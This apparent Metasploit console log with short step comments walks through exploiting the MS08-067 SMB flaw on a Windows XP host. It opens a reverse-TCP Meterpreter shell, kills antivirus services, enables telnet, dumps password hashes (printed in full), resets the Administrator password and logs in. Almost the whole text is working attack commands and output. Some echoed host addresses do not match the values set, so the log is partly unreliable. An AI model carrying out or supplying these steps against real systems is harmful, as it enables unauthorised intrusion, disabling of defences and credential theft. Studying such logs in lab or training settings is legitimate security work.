msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(ms08_067_netapi) > set LHOST 192.168.100.1
LHOST => 192.168.1.45
msf exploit(ms08_067_netapi) > set RHOST 192.168.100.2
RHOST => 192.168.1.200
msf exploit(ms08_067_netapi) > exploit -f
[*] Started reverse handler on 192.168.100.1:4444
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP Service Pack 3 - lang:English
[*] Selected Target: Windows XP SP3 English (NX)
[*] Attempting to trigger the vulnerability...
[*] Sending stage (748032 bytes) to 192.168.100.2
[*] Meterpreter session 1 opened (192.168.100.1:4444 -> 192.168.100.2:1913)
kill av, get telnet
meterpreter > run killav
[*] Killing Antivirus services on the target...
[*] Killing off cmd.exe...
meterpreter > run gettelnet -e
[*] Windows Telnet Server Enabler Meterpreter Script
[*] Setting Telnet Server Services service startup mode
[*] The Telnet Server Services service is not set to auto, changing it to auto ...
[*] Opening port in local firewall if necessary
In case there are accounts other than Administrator:
meterpreter > hashdump
Administrator:500:e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c:::
victim:1003:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HelpAssistant:1000:7d006c3deefcb55524e896ae900db85e:3c877a4ddf86e32f4c1e5b36217db268:::
SUPPORT_388945a0?:1002:aad3b435b51404eeaad3b435b51404ee:77d358f2c00b3af0f58f110c778d7f05:::
execute, interact
meterpreter > execute -f cmd.exe -c
Process 6220 created.
Channel 8 created.
meterpreter > interact 8
Interacting with channel 8...
Set the Administrator password to “password”
C:\WINDOWS>net user Administrator password
net user Administrator password
The command completed successfully.
Check whether port 23 (telnet) is now open
root@bt:~# nmap -p 23 192.168.100.2
Starting Nmap 5.00 ( http://nmap.org ) at 2010-04-06 07:37 UTC
Interesting ports on 192.168.100.2:
PORT   STATE SERVICE
23/tcp open  telnet
MAC Address: 00:1F:C6:0B:1A:A1 (victim Computer)
Nmap done: 1 IP address (1 host up) scanned in 0.30 seconds
Log in via telnet
root@bt:~# telnet 192.168.100.2
Trying 192.168.100.2...
Connected to 192.168.100.2.
Escape character is '^]'.
Welcome to Microsoft Telnet Service
login: Administrator
password:
*===============================================================
Welcome to Microsoft Telnet Server.
*===============================================================
C:\>